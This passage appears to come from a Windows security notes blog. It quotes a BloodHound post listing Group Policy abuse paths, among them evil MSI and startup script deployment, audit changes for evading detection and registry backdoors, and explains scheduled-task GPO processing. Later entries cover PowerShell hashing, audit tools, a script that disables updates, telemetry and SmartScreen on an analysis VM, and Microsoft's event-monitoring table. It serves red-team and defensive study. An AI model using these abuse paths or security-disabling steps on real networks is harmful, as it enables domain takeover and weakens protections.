  • Policy Location: Computer Configuration\Policies\Software Settings\Software installation
  • Abuse: Deploy an evil MSI. The MSI must be available to the GP client via a network share.

  • Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown)
  • Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments.

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Audit Policy
  • Abuse: Modify local audit settings. Useful for evading detection.

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment\
  • Abuse: Grant a user the right to logon via RDP, grant a user SeDebugPrivilege, grant a user the right to load device drivers, grant a user seTakeOwnershipPrivilege. Basically, take over the remote computer without ever being an administrator on it.

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Registry
  • Abuse: Alter DACLs on registry keys, grant yourself an extremely hard to find backdoor on the system.

  • Policy Location: Computer Configuration\Policies\Windows Settings\Security Settings\Windows Firewall
  • Abuse: Manage the Windows firewall. Open up ports if they’re blocked.

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Environment
  • Abuse: Add UNC path for DLL side loading.

  • Policy Location: Computer Configuration\Preferences\Windows Settings\Files
  • Abuse: Copy a file from a remote UNC path.

So, that’s all well and good, but how do we actually take these actions? Currently, you’ve got two options: download and install the Group Policy Management Console and use the GPMC GUI to modify the relevant GPO or manually craft the relevant policy file and correctly modify the GPO and gpt.ini file.

As an example, let’s say you want to push a new immediate scheduled task to a computer or user. My current understanding (which is definitely subject to correction), based on testing and the Microsoft Group Policy Preferences functional spec, follows:

Whenever a group policy client (user or computer) checks for updated group policy, they will go through several steps to collect and apply Group Policy to themselves. The client will check whether the remote version of the GPO is greater than the locally cached version of that GPO (unless gpupdate /force is used). The remote version of the GPO is stored in two locations:

  1. As an integer value for the versionNumber attribute on the Group Policy Object itself.
  2. As the same integer in the GPT.INI file, located at \\<domain.com>\Policies\<gpo name>\GPT.ini. Note that the “name” of the GPO is not the display name. For instance, the “name” for the Default Domain Policy is {6AC1786C-016F-11D2-945F-00C04fB984F9}.

If the remote GPO version number is greater than the locally cached version, the group policy client will continue, analyzing which policies and/or preferences it needs to search for in the relevant SYSVOL directory. For Group Policy preferences (which scheduled tasks fall under), the group policy client will check to see which Client-Side Extensions (CSEs) exist as part of the “gPCMachineExtensionNames” and “gPCUserExtensionNames” attributes. According to the Microsoft Group Policy Preferences functional spec, CSE GUIDs “enable a specific client-side extension on the Group Policy client to be associated with policy data that is stored in the logical and physical components of a Group Policy Object (GPO) on the Group Policy server, for that particular extension.” The CSE GUIDs for Immediate Scheduled tasks, as they would be stored in the “gPCMachineExtensionNames” attribute, are:

[{00000000-0000-0000-0000-000000000000}{79F92669-4224-476C-9C5C-6EFB4D87DF4A}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]

And in a slightly more readable format:

[
    {00000000-0000-0000-0000-000000000000}
    {79F92669-4224-476C-9C5C-6EFB4D87DF4A}
    {CAB54552-DEEA-4691-817E-ED4A4D1AFC72}
]
[
    {AADCED64-746C-4633-A97C-D61349046527}
    {CAB54552-DEEA-4691-817E-ED4A4D1AFC72}
]

This translates to the following:

[
    {Core GPO Engine}
    {Preference Tool CSE GUID Local users and groups}
    {Preference Tool CSE GUID Scheduled Tasks}
]
[
    {Preference CSE GUID Scheduled Tasks}
    {Preference Tool CSE GUID Scheduled Tasks}
]

Once the group policy client understands that there are some scheduled tasks that apply to it, it will search for a file in the GP directory called ScheduledTasks.xml. That file exists in a predictable location:

\\<domain.com>\sysvol\<domain.com>\Policies\<gpo-name>\Machine\Preferences\ScheduledTasks.xml

Finally, the group policy client will parse the ScheduledTasks.xml and register the task locally.
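A defender auditing GPOs for unexpected Scheduled Tasks preferences and for version bumps can work from the two structures described above. The following Python is an added example, not code from the BloodHound post or project: the GUID meanings are the ones listed above, the gPCMachineExtensionNames value, GPT.INI text and AD versionNumber are constructed sample data, and the 16-bit split of the version into computer and user halves is standard GPO behaviour that the post itself does not describe.

```python
import re
from configparser import ConfigParser

# CSE / tool GUIDs with the meanings the post gives them.
KNOWN_GUIDS = {
    "{00000000-0000-0000-0000-000000000000}": "Core GPO Engine",
    "{79F92669-4224-476C-9C5C-6EFB4D87DF4A}": "Preference Tool CSE GUID Local users and groups",
    "{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}": "Preference Tool CSE GUID Scheduled Tasks",
    "{AADCED64-746C-4633-A97C-D61349046527}": "Preference CSE GUID Scheduled Tasks",
}
SCHEDULED_TASKS_CSE = "{AADCED64-746C-4633-A97C-D61349046527}"

GROUP_RE = re.compile(r"\[([^\]]*)\]")
GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


def parse_extension_names(attr):
    """Split a gPC*ExtensionNames value such as '[{a}{b}][{c}{d}]' into groups.

    Each bracketed group is a list of GUIDs; the first GUID of a group is the
    client-side extension that the rest of the group is associated with.
    """
    groups = []
    for body in GROUP_RE.findall(attr):
        guids = [g.upper() for g in GUID_RE.findall(body)]
        if guids:
            groups.append(guids)
    return groups


def describe_extensions(attr):
    """Map every GUID to the name the post gives it (or mark it unknown)."""
    return [[KNOWN_GUIDS.get(g, "unknown " + g) for g in group]
            for group in parse_extension_names(attr)]


def registers_scheduled_tasks(attr):
    """True when some group is headed by the Scheduled Tasks preference CSE,
    i.e. the client will go looking for ScheduledTasks.xml under the GPO."""
    return any(group[0] == SCHEDULED_TASKS_CSE
               for group in parse_extension_names(attr))


def gpt_ini_version(gpt_ini_text):
    """Read Version= from the [General] section of a GPT.INI."""
    parser = ConfigParser()
    parser.read_string(gpt_ini_text)
    return int(parser["General"]["Version"])


def check_versions(ad_version_number, gpt_ini_text):
    """Compare the AD versionNumber with GPT.INI and split out the two halves.

    The low 16 bits count computer-policy changes and the high 16 bits count
    user-policy changes (standard GPO behaviour, not stated in the post).
    A mismatch means the two copies of the GPO version are out of sync.
    """
    ini_version = gpt_ini_version(gpt_ini_text)
    return {
        "ad_version": ad_version_number,
        "gpt_ini_version": ini_version,
        "match": ad_version_number == ini_version,
        "machine_version": ad_version_number & 0xFFFF,
        "user_version": ad_version_number >> 16,
    }


def client_will_reapply(remote_version, cached_version, force=False):
    """The client's gate described above: reapply only when the remote
    version is greater than the cached copy, unless gpupdate /force is used."""
    return force or remote_version > cached_version


# Constructed sample data: the attribute value quoted in the post and a GPT.INI.
SAMPLE_ATTR = ("[{00000000-0000-0000-0000-000000000000}{79F92669-4224-476C-9C5C-6EFB4D87DF4A}"
               "{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"
               "[{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]")
SAMPLE_GPT_INI = "[General]\nVersion=65539\ndisplayName=New Group Policy Object\n"

if __name__ == "__main__":
    for group in describe_extensions(SAMPLE_ATTR):
        print(group)
    print("scheduled tasks CSE registered:", registers_scheduled_tasks(SAMPLE_ATTR))
    print(check_versions(65539, SAMPLE_GPT_INI))
    print("client reapplies (cached 65538):", client_will_reapply(65539, 65538))
```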

That’s how the process works, as I understand it. There is still a lot of work to be done on crafting scripts to automate the GPO abuse process, as installing GPMC is rarely a great option while on a red team assessment. If ever there were a call to arms, this is it: we’ll continue working on creating scripts that reliably automate GPO control abuse, but are equally as excited to see what people in the community can come up with as well.


Conclusion

As Rohan mentioned in his post, BloodHound 1.5 represents a pretty big milestone for the BloodHound project. By adding in GPOs and OU structure, we’re greatly increasing the scope of Active Directory attack surface you can easily map out with BloodHound. In a future blog post, I’ll focus more on the defensive side of things, showing how defenders can use BloodHound to analyze and reduce the attack surface in AD now that we’re tracking GPOs and OU structure.

BloodHound is available free and open source on GitHub at https://github.com/BloodHoundAD/BloodHound
You can join us on Slack at the official BloodHound Gang Slack here: https://bloodhoundgang.herokuapp.com/

DRIF: computing file hashes recursively in Windows

13 August 2018



current folder: dir | Get-FileHash

current folder and subfolders: dir -recurse | Get-FileHash

exclude *.log files: dir -recurse -exclude *.log | Get-FileHash

Note: the default hashing algorithm is SHA256. You can use any of: MD5, SHA1, SHA256 (default), SHA384, SHA512, MACTripleDES, RIPEMD160:

dir -recurse -exclude *.log | Get-FileHash -Algorithm SHA512

more details: Get-Help Get-FileHash

current folder and subfolders, wrapping long lines in the output: dir -recurse | Get-FileHash | Format-Table -Wrap

Writing custom DSC resources with MOF

15 June 2018

DSC and MOF - PowerShell

https://docs.microsoft.com/pl-pl/powershell/dsc/authoringresourcemof

Categories: PowerShell, Windows

Windows Defender Device Guard

10 June 2018

https://demo.wd.microsoft.com/?ocid=cx-wddocs-testground


https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/windows-defender-exploit-guard

https://docs.microsoft.com/en-us/windows/security/threat-protection/device-guard/introduction-to-device-guard-virtualization-based-security-and-windows-defender-application-control

Audit Windows Infrastructure

10 June 2018

The WINspect script provides audit checks and enumeration:

  • Checking for installed security products.
  • Checking for DLL hijackability (Authenticated Users security context).
  • Checking for User Account Control settings.
  • Checking for unattended installs leftovers.
  • Enumerating world-exposed local filesystem shares.
  • Enumerating domain users and groups with local group membership.
  • Enumerating registry autoruns.
  • Enumerating local services that are configurable by Authenticated Users group members.
  • Enumerating local services for which corresponding binary is writable by Authenticated Users group members.
  • Enumerating non-system32 Windows Hosted Services and their associated DLLs.
  • Enumerating local services with unquoted path vulnerability.
  • Enumerating non-system scheduled tasks.

https://github.com/A-mIn3/WINspect

https://isc.sans.edu/forums/diary/Windows+Auditing+with+WINspect/22810/

Interesting material to explore

4 June 2018

Detecting Lateral Movement through Tracking Event Logs (Japan CERT)

https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf

Silent Windows 10 for Malware Analysis

9 May 2018

REM *** stop telemetry, search and update services ***
sc stop DiagTrack
sc stop diagnosticshub.standardcollector.service
sc stop dmwappushservice
sc stop WMPNetworkSvc
sc stop WSearch
sc stop wuauserv

REM *** keep them from starting again after reboot ***
sc config DiagTrack start= disabled
sc config diagnosticshub.standardcollector.service start= disabled
sc config dmwappushservice start= disabled
sc config WMPNetworkSvc start= disabled
sc config WSearch start= disabled
sc config wuauserv start= disabled

REM *** disable telemetry / CEIP / SmartScreen scheduled tasks ***
schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /Disable
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /Disable
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn" /Disable
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack" /Disable
schtasks /Change /TN "Microsoft\Office\Office 15 Subscription Heartbeat" /Disable

schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable
schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable
schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable
schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /Disable

@rem *** Telemetry and Data Collection ***
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v PreventDeviceMetadataFromNetwork /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "AITEnable" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger" /v "Start" /t REG_DWORD /d 0 /f

REM *** per-user: advertising ID, SmartScreen for store apps, language header ***
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v Enabled /t REG_DWORD /d 0 /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f
reg add "HKCU\Control Panel\International\User Profile" /v HttpAcceptLanguageOptOut /t REG_DWORD /d 1 /f

REM *** Windows Update: no peer-to-peer delivery, no automatic updates ***
reg add "HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v UxOption /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v DODownloadMode /t REG_DWORD /d 0 /f

REM note: the key name must be exactly "AU"; a trailing space would create a separate, ignored key
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /v AUOptions /t reg_dword /d 2
reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /v ScheduledInstallDay /t reg_dword /d 0

REM *** Explorer: show file extensions (hidden/system files left at defaults) ***
REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f
REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 0 /f

REM *** remove OneDrive ***
start /wait "" "%SYSTEMROOT%\SYSWOW64\ONEDRIVESETUP.EXE" /UNINSTALL
rd C:\OneDriveTemp /Q /S >NUL 2>&1
rd "%USERPROFILE%\OneDrive" /Q /S >NUL 2>&1
rd "%LOCALAPPDATA%\Microsoft\OneDrive" /Q /S >NUL 2>&1
rd "%PROGRAMDATA%\Microsoft OneDrive" /Q /S >NUL 2>&1
reg add "HKEY_CLASSES_ROOT\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1
reg add "HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1
REM restart Explorer so the OneDrive shell folder disappears from the navigation pane
start /wait TASKKILL /F /IM explorer.exe
start explorer.exe


Windows security

7 May 2018
https://www.sans.org/reading-room/whitepapers/microsoft/securing-windows-10-giac-enterprise-endpoint-ise-m-6100-security-project-practicum-technical-paper-36592

Events to Monitor

Windows | 10 February 2018

source: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor

Appendix L: Events to Monitor

Applies To: Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

The following table lists events that you should monitor in your environment, according to the recommendations provided in Monitoring Active Directory for Signs of Compromise. In the following table, the "Current Windows Event ID" column lists the event ID as it is implemented in versions of Windows and Windows Server that are currently in mainstream support.

The "Legacy Windows Event ID" column lists the corresponding event ID in legacy versions of Windows such as client computers running Windows XP or earlier and servers running Windows Server 2003 or earlier. The "Potential Criticality" column identifies whether the event should be considered of low, medium, or high criticality in detecting attacks, and the "Event Summary" column provides a brief description of the event.

A potential criticality of High means that one occurrence of the event should be investigated. Potential criticality of Medium or Low means that these events should only be investigated if they occur unexpectedly or in numbers that significantly exceed the expected baseline in a measured period of time. All organizations should test these recommendations in their environments before creating alerts that require mandatory investigative responses. Every environment is different, and some of the events ranked with a potential criticality of High may occur due to other harmless events.
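To show how the criticality rule above turns into alerting logic, here is an added Python example (not from the Microsoft appendix or this blog). It carries a handful of the table's Current/Legacy ID and criticality pairs, treats "Medium to High" like Medium with a zero baseline (an assumption of this example), and runs over constructed log lines in a simple timestamp,EventID,Computer,Account format.

```python
from collections import Counter

# A handful of rows from the table: Current Windows Event ID -> Potential Criticality.
CRITICALITY = {
    4618: "High", 4719: "High", 4765: "High", 4794: "High",
    1102: "Medium to High",
    4724: "Medium", 4739: "Medium",
    4624: "Low", 4625: "Low", 4688: "Low", 4720: "Low",
}

# Legacy Windows Event IDs for the same rows, so Windows Server 2003-era
# logs can be triaged with the same rule.
LEGACY_TO_CURRENT = {
    612: 4719, 517: 1102, 628: 4724, 643: 4739,
    528: 4624, 540: 4624, 529: 4625, 592: 4688, 624: 4720,
}


def normalize_event_id(event_id):
    """Translate a legacy ID to its current equivalent; current IDs pass through."""
    return LEGACY_TO_CURRENT.get(event_id, event_id)


def parse_event_line(line):
    """Parse one 'timestamp,EventID,Computer,Account' line (constructed CSV format)."""
    ts, event_id, computer, account = line.strip().split(",", 3)
    return {"time": ts, "id": normalize_event_id(int(event_id)),
            "computer": computer, "account": account}


def triage(lines, baseline):
    """Apply the appendix's rule to one window of events.

    High: every occurrence is an alert. Medium / Low (and, as an assumption
    here, 'Medium to High'): alert only when the count in the window exceeds
    the expected baseline for that ID (no baseline means 0, i.e. unexpected).
    Returns (event_id, criticality, count, reason) tuples sorted by event ID.
    """
    events = [parse_event_line(l) for l in lines if l.strip()]
    counts = Counter(e["id"] for e in events)
    alerts = []
    for event_id, count in sorted(counts.items()):
        crit = CRITICALITY.get(event_id)
        if crit is None:
            continue  # not in the monitored subset
        if crit == "High":
            alerts.append((event_id, crit, count, "investigate every occurrence"))
        else:
            expected = baseline.get(event_id, 0)
            if count > expected:
                alerts.append((event_id, crit, count,
                               f"{count} occurrences exceed baseline of {expected}"))
    return alerts


# Constructed sample data (not real logs): one short window of events.
SAMPLE_LINES = """\
2018-02-10T08:00:01,4624,WS01,alice
2018-02-10T08:00:05,4688,WS01,alice
2018-02-10T08:01:10,4625,WS01,bob
2018-02-10T08:01:12,4625,WS01,bob
2018-02-10T08:01:14,4625,WS01,bob
2018-02-10T08:01:16,4625,WS01,bob
2018-02-10T08:02:00,4719,DC01,SYSTEM
2018-02-10T08:02:30,1102,DC01,eve
2018-02-10T08:03:00,4720,DC01,admin
2018-02-10T08:04:00,612,SRV2003,SYSTEM
""".splitlines()

# Constructed baselines: expected counts per ID for a window of this size.
SAMPLE_BASELINE = {4624: 500, 4625: 3, 4688: 2000, 4720: 1, 4724: 5}

if __name__ == "__main__":
    for alert in triage(SAMPLE_LINES, SAMPLE_BASELINE):
        print(alert)
```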

| Current Windows Event ID | Legacy Windows Event ID | Potential Criticality | Event Summary |
|---|---|---|---|
| 4618 | N/A | High | A monitored security event pattern has occurred. |
| 4649 | N/A | High | A replay attack was detected. May be a harmless false positive due to misconfiguration error. |
| 4719 | 612 | High | System audit policy was changed. |
| 4765 | N/A | High | SID History was added to an account. |
| 4766 | N/A | High | An attempt to add SID History to an account failed. |
| 4794 | N/A | High | An attempt was made to set the Directory Services Restore Mode. |
| 4897 | 801 | High | Role separation enabled: |
| 4964 | N/A | High | Special groups have been assigned to a new logon. |
| 5124 | N/A | High | A security setting was updated on the OCSP Responder Service |
| N/A | 550 | Medium to High | Possible denial-of-service (DoS) attack |
| 1102 | 517 | Medium to High | The audit log was cleared |
| 4621 | N/A | Medium | Administrator recovered system from CrashOnAuditFail. Users who are not administrators will now be allowed to log on. Some auditable activity might not have been recorded. |
| 4675 | N/A | Medium | SIDs were filtered. |
| 4692 | N/A | Medium | Backup of data protection master key was attempted. |
| 4693 | N/A | Medium | Recovery of data protection master key was attempted. |
| 4706 | 610 | Medium | A new trust was created to a domain. |
| 4713 | 617 | Medium | Kerberos policy was changed. |
| 4714 | 618 | Medium | Encrypted data recovery policy was changed. |
| 4715 | N/A | Medium | The audit policy (SACL) on an object was changed. |
| 4716 | 620 | Medium | Trusted domain information was modified. |
| 4724 | 628 | Medium | An attempt was made to reset an account's password. |
| 4727 | 631 | Medium | A security-enabled global group was created. |
| 4735 | 639 | Medium | A security-enabled local group was changed. |
| 4737 | 641 | Medium | A security-enabled global group was changed. |
| 4739 | 643 | Medium | Domain Policy was changed. |
| 4754 | 658 | Medium | A security-enabled universal group was created. |
| 4755 | 659 | Medium | A security-enabled universal group was changed. |
| 4764 | 667 | Medium | A security-disabled group was deleted |
| 4764 | 668 | Medium | A group's type was changed. |
| 4780 | 684 | Medium | The ACL was set on accounts which are members of administrators groups. |
| 4816 | N/A | Medium | RPC detected an integrity violation while decrypting an incoming message. |
| 4865 | N/A | Medium | A trusted forest information entry was added. |
| 4866 | N/A | Medium | A trusted forest information entry was removed. |
| 4867 | N/A | Medium | A trusted forest information entry was modified. |
| 4868 | 772 | Medium | The certificate manager denied a pending certificate request. |
| 4870 | 774 | Medium | Certificate Services revoked a certificate. |
| 4882 | 786 | Medium | The security permissions for Certificate Services changed. |
| 4885 | 789 | Medium | The audit filter for Certificate Services changed. |
| 4890 | 794 | Medium | The certificate manager settings for Certificate Services changed. |
| 4892 | 796 | Medium | A property of Certificate Services changed. |
| 4896 | 800 | Medium | One or more rows have been deleted from the certificate database. |
| 4906 | N/A | Medium | The CrashOnAuditFail value has changed. |
| 4907 | N/A | Medium | Auditing settings on object were changed. |
| 4908 | N/A | Medium | Special Groups Logon table modified. |
| 4912 | 807 | Medium | Per User Audit Policy was changed. |
| 4960 | N/A | Medium | IPsec dropped an inbound packet that failed an integrity check. If this problem persists, it could indicate a network issue or that packets are being modified in transit to this computer. Verify that the packets sent from the remote computer are the same as those received by this computer. This error might also indicate interoperability problems with other IPsec implementations. |
| 4961 | N/A | Medium | IPsec dropped an inbound packet that failed a replay check. If this problem persists, it could indicate a replay attack against this computer. |
| 4962 | N/A | Medium | IPsec dropped an inbound packet that failed a replay check. The inbound packet had too low a sequence number to ensure it was not a replay. |
| 4963 | N/A | Medium | IPsec dropped an inbound clear text packet that should have been secured. This is usually due to the remote computer changing its IPsec policy without informing this computer. This could also be a spoofing attack attempt. |
| 4965 | N/A | Medium | IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI). This is usually caused by malfunctioning hardware that is corrupting packets. If these errors persist, verify that the packets sent from the remote computer are the same as those received by this computer. This error may also indicate interoperability problems with other IPsec implementations. In that case, if connectivity is not impeded, then these events can be ignored. |
| 4976 | N/A | Medium | During Main Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation. |
| 4977 | N/A | Medium | During Quick Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation. |
| 4978 | N/A | Medium | During Extended Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation. |
| 4983 | N/A | Medium | An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted. |
| 4984 | N/A | Medium | An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted. |
| 5027 | N/A | Medium | The Windows Firewall Service was unable to retrieve the security policy from the local storage. The service will continue enforcing the current policy. |
| 5028 | N/A | Medium | The Windows Firewall Service was unable to parse the new security policy. The service will continue with currently enforced policy. |
| 5029 | N/A | Medium | The Windows Firewall Service failed to initialize the driver. The service will continue to enforce the current policy. |
| 5030 | N/A | Medium | The Windows Firewall Service failed to start. |
| 5035 | N/A | Medium | The Windows Firewall Driver failed to start. |
| 5037 | N/A | Medium | The Windows Firewall Driver detected critical runtime error. Terminating. |
| 5038 | N/A | Medium | Code integrity determined that the image hash of a file is not valid. The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error. |
| 5120 | N/A | Medium | OCSP Responder Service Started |
| 5121 | N/A | Medium | OCSP Responder Service Stopped |
| 5122 | N/A | Medium | A configuration entry changed in OCSP Responder Service |
| 5123 | N/A | Medium | A configuration entry changed in OCSP Responder Service |
| 5376 | N/A | Medium | Credential Manager credentials were backed up. |
| 5377 | N/A | Medium | Credential Manager credentials were restored from a backup. |
| 5453 | N/A | Medium | An IPsec negotiation with a remote computer failed because the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not started. |
| 5480 | N/A | Medium | IPsec Services failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem. |
| 5483 | N/A | Medium | IPsec Services failed to initialize RPC server. IPsec Services could not be started. |
| 5484 | N/A | Medium | IPsec Services has experienced a critical failure and has been shut down. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks. |
| 5485 | N/A | Medium | IPsec Services failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem. |
| 6145 | N/A | Medium | One or more errors occurred while processing security policy in the Group Policy objects. |
| 6273 | N/A | Medium | Network Policy Server denied access to a user. |
| 6274 | N/A | Medium | Network Policy Server discarded the request for a user. |
| 6275 | N/A | Medium | Network Policy Server discarded the accounting request for a user. |
| 6276 | N/A | Medium | Network Policy Server quarantined a user. |
| 6277 | N/A | Medium | Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy. |
| 6278 | N/A | Medium | Network Policy Server granted full access to a user because the host met the defined health policy. |
| 6279 | N/A | Medium | Network Policy Server locked the user account due to repeated failed authentication attempts. |
| 6280 | N/A | Medium | Network Policy Server unlocked the user account. |
| - | 640 | Medium | General account database changed |
| - | 619 | Medium | Quality of Service Policy changed |
| 24586 | N/A | Medium | An error was encountered converting volume |
| 24592 | N/A | Medium | An attempt to automatically restart conversion on volume %2 failed. |
| 24593 | N/A | Medium | Metadata write: Volume %2 returning errors while trying to modify metadata. If failures continue, decrypt volume |
| 24594 | N/A | Medium | Metadata rebuild: An attempt to write a copy of metadata on volume %2 failed and may appear as disk corruption. If failures continue, decrypt volume. |
| 4608 | 512 | Low | Windows is starting up. |
| 4609 | 513 | Low | Windows is shutting down. |
| 4610 | 514 | Low | An authentication package has been loaded by the Local Security Authority. |
| 4611 | 515 | Low | A trusted logon process has been registered with the Local Security Authority. |
| 4612 | 516 | Low | Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits. |
| 4614 | 518 | Low | A notification package has been loaded by the Security Account Manager. |
| 4615 | 519 | Low | Invalid use of LPC port. |
| 4616 | 520 | Low | The system time was changed. |
| 4622 | N/A | Low | A security package has been loaded by the Local Security Authority. |
| 4624 | 528,540 | Low | An account was successfully logged on. |
| 4625 | 529-537,539 | Low | An account failed to log on. |
| 4634 | 538 | Low | An account was logged off. |
| 4646 | N/A | Low | IKE DoS-prevention mode started. |
| 4647 | 551 | Low | User initiated logoff. |
| 4648 | 552 | Low | A logon was attempted using explicit credentials. |
| 4650 | N/A | Low | An IPsec Main Mode security association was established. Extended Mode was not enabled. Certificate authentication was not used. |
| 4651 | N/A | Low | An IPsec Main Mode security association was established. Extended Mode was not enabled. A certificate was used for authentication. |
| 4652 | N/A | Low | An IPsec Main Mode negotiation failed. |
| 4653 | N/A | Low | An IPsec Main Mode negotiation failed. |
| 4654 | N/A | Low | An IPsec Quick Mode negotiation failed. |
| 4655 | N/A | Low | An IPsec Main Mode security association ended. |
| 4656 | 560 | Low | A handle to an object was requested. |
| 4657 | 567 | Low | A registry value was modified. |
| 4658 | 562 | Low | The handle to an object was closed. |
| 4659 | N/A | Low | A handle to an object was requested with intent to delete. |
| 4660 | 564 | Low | An object was deleted. |
| 4661 | 565 | Low | A handle to an object was requested. |
| 4662 | 566 | Low | An operation was performed on an object. |
| 4663 | 567 | Low | An attempt was made to access an object. |
| 4664 | N/A | Low | An attempt was made to create a hard link. |
| 4665 | N/A | Low | An attempt was made to create an application client context. |
| 4666 | N/A | Low | An application attempted an operation: |
| 4667 | N/A | Low | An application client context was deleted. |
| 4668 | N/A | Low | An application was initialized. |
| 4670 | N/A | Low | Permissions on an object were changed. |
| 4671 | N/A | Low | An application attempted to access a blocked ordinal through the TBS. |
| 4672 | 576 | Low | Special privileges assigned to new logon. |
| 4673 | 577 | Low | A privileged service was called. |
| 4674 | 578 | Low | An operation was attempted on a privileged object. |
| 4688 | 592 | Low | A new process has been created. |
| 4689 | 593 | Low | A process has exited. |
| 4690 | 594 | Low | An attempt was made to duplicate a handle to an object. |
| 4691 | 595 | Low | Indirect access to an object was requested. |
| 4694 | N/A | Low | Protection of auditable protected data was attempted. |
| 4695 | N/A | Low | Unprotection of auditable protected data was attempted. |
| 4696 | 600 | Low | A primary token was assigned to process. |
| 4697 | 601 | Low | Attempt to install a service |
